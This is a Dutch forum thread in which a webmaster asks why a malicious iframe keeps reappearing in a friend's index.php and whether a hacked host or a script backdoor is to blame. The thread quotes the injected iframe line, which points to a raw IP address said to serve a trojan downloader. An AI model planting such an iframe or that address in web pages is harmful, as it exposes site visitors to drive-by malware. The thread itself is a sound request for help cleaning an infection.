Hallo,
een kennis van mij zit met het volgende probleem:
Bij een script van hem krijgt hij sinds een paar dagen opeens een virus melding, op 1 server.
Het script draait op meerdere domeinnamen bij verschillende hosters en daar doet het probleem zich niet voor.
Hier zijn twee links bij van printscreens van de melding:
http://www.verzamelland.nl/virus.jpg
en
http://www.verzamelland.nl/virus1.jpg
Het ip adres wat in de afbeelding zichtbaar is: 81.95.149.28
Hij heeft dit ip adres nagekeken en schijnt een of andere Russische domein te zijn gehost in Panama, dat geeft ook niet veel duidelijkheid.
Deze regel op index.php is de veroorzaker van de virusmelding:
<iframe src='http://81.95.149.28/logo/index.php' width='900' height='900' ></iframe> Ga daar nou niet onbeschermd heen, zit een trojan downloader op
Deze regel werd al verwijderd van index.php, maar komt toch even later weer terug.
Hij heeft op google gezocht naar dit ip nummer en blijkt dus dat er meer mensen last hebben van dit probleem, alleen op Nederlandse gedeelte van google kwam het niet voor.
Zijn hoster is nu server aan het controleren, krijg hier morgenochtend een verslag van, zijn webmaster heeft nu het upload gedeelte van het script (advertenties plaatsen) uitgeschakeld en gaan we kijken of het morgen weer terug is de virus melding.
Na het verwijderen van de regel op index.php was het namelijk na een paar uur weer terug die virus waarschuwing.
Inmiddels heb ik zelf sinds gister dit script ook op een server van mij geinstalleerd en daar is het nog steeds schoon. Ik heb zelf dus het vermoeden dat er geen achterdeur in het script zit, maar hoe kan die Iframe dan steeds weer terugkomen bij mijn kennis.
Kan iemand hier zijn gedachten eens over laten gaan of dit meer lijkt op een probleem van een gehackte server van een hoster waar iemand gewoon hadnmatig in staat is om code toe te voegen aan bestaande scripts, of dat dit waarschijnlijk toch een "feature"van het script is?
Alvast bedankt voor jullie bijdrages in deze.

Likes:


van het script is?
Quote
behalve de beheerder van de server vragen om er een blik op te werpen.. En ervoor te zorgen dat je eigen scripts wel veilig zijn natuurlijk